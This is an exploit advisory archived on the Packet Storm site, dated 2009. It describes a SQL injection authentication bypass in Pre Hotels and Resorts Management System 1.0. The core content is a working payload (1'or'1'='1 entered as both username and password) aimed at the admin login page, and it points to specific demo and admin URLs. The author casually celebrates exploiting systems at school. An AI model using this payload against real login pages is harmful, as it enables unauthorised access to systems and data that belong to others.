exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Pre Hotels And Resorts Management System SQL Injection

Pre Hotels And Resorts Management System SQL Injection
Posted Dec 21, 2009
Authored by Packetdeath | Site ssteam.ws

Pre Hotels and Resorts Management System suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection
SHA-256 | ccd917de16ae006850643af05572a502b28ab5ee8e16c9aa5a745eff9ef5628a

Pre Hotels And Resorts Management System SQL Injection

Change Mirror Download

____ _ ____ _ __ U _____ u _____ ____ U _____ u _ _____ _ _
U| _"\ uU /"\ uU /"___| |"|/ / \| ___"|/|_ " _|| _"\ \| ___"|/U /"\ u |_ " _| |'| |'|
\| |_) |/ \/ _ \/ \| | u | ' / | _|" | | /| | | | | _|" \/ _ \/ | | /| |_| |\
| __/ / ___ \ | |/__U/| . \\u | |___ /| |\U| |_| |\| |___ / ___ \ /| |\ U| _ |u
|_| /_/ \_\ \____| |_|\_\ |_____| u |_|U |____/ u|_____| /_/ \_\ u |_|U |_| |_|
||>>_ \\ >> _// \\,-,>> \\,-.<< >> _// \\_ |||_ << >> \\ >> _// \\_ // \\
(__)__) (__) (__)__)(__)\.) (_/(__) (__)__) (__)__)_) (__) (__)(__) (__)__) (__)_") ("_)
--------------------------------------------------------------------------------------------------
Author: Packetdeath
Homepage: www.it-security.biz
D/T: 12:54 PM 12/18/2009
Contact: yaii_abc@hotmail.com
--------------------------------------------------------------------------------------------------
Target: PRE HOTELS & RESORTS MANAGEMENT SYSTEM [login bypass VIA SQL iNJECTION]
URL: http://www.preprojects.com/hotel.asp
Demo: http://www.aebest.com/home/home.asp
Admin demo: http://www.aebest.com/trial_admin/admin_login.asp

Version: 1.0
Price: $44.00
^^ And we paid for security?
------------------------------------------------------------------------
Tested on XP/SP3 [EN]
------------------------------------------------------------------------
Side note: bi0 is the shit, and exploiting at school is fun.
------------------------------------------------------------------------
Greetz: bi0, Annexxempire, code4fun, Lo$er, c0nd0m, sp1r1t, Cr0nix
Rest in peace Rock4Ever! You will be missed. from your family at SSTeam.
------------------------------------------------------------------------

Exploit:

http://[server]/[path]/admin_login.asp

Navagate to login page and enter:

Username: 1'or'1'='1
Password: 1'or'1'='1

------------------------------------------------------------------------

becuase 1 is always equal to 1.... Pools Closed, LOL!!!!!
Wha

/Packetdeath







Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close